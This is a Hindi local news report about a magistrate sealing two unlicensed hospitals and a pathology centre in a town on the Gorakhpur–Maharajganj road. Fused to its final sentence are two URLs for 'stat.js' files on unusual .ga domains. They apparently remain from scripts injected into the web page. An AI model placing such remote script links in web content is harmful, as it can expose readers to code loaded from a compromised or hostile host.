कस्बे में बिना लाइसेंस व प्रशिक्षित चिकित्सको के द्वारा चला रहे दो अवैध अस्पतालों व एक पैथोलॉजी सेंटर को मजिस्ट्रेट/ उप जिलाधिकारी सदर गौरव सिंह सोगरवाल ने सोमवार को सील कर दिया। अस्पतालों में 2 आशा कार्यकर्ता महिलाओं का इलाज कराते पाई गई है। उनके खिलाफ कार्यवाही के लिए सीएचसी अधीक्षक डॉ अश्वनी कुमार चौरसिया को कहा गया है। वही एकअस्पताल संचालक के खिलाफ शांति भंग की कार्रवाई की गई है।

 

 

गोरखपुर-महाराजगंज मुख्य मार्ग पर ब्लॉक मुख्यालय के सामने सेवा हॉस्पिटल में बिना प्रशिक्षित चिकित्सक के अल्ट्रासाउंड किया जा रहा था। हॉस्पिटल में बिना प्रशिक्षित चिकित्सको के द्वारा लोगों द्वारा ऑपरेशन करने के साथ ही अस्पताल संचालन में मानक की धज्जियां उड़ाई जा रही थी। निरीक्षण करने पहुंचे ज्वाइंट मजिस्ट्रेट ने सीएचसी अध्यक्ष को अस्पताल को तत्काल सील करने का निर्देश दिया। अस्पताल में इलाज करवा रहे मरीजों को अन्य जगह स्थानांतरित करते हुए सील किया गया है ।

 

 

 

बिना लाइसेंस के अलग-अलग चल रहे राज हॉस्पिटल और पैथोलॉजी सेंटर में कोई प्रशिक्षित चिकित्सक या कर्मचारी नहीं मिला। वहीं अस्पताल में तीन लड़कियां नर्स की ड्रेस में मिली, जिन्हें किसी प्रकार का प्रशिक्षण प्राप्त नहीं है। अस्पताल संचालन मधुसूदन चौधरी ने बताया कि रजिस्ट्रेशन के लिए प्रार्थना पत्र दिया गया है लेकिन लाइसेंस अभी प्राप्त नहीं हुआ है। राज हॉस्पिटल के संचालक मधुसूदन चौधरी को अनावश्यक बहस करने के कारण और शांतिभंग में चलाने के कारण चौकी प्रभारी वीरेंद्र सिंह को निर्देशित किया गया।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.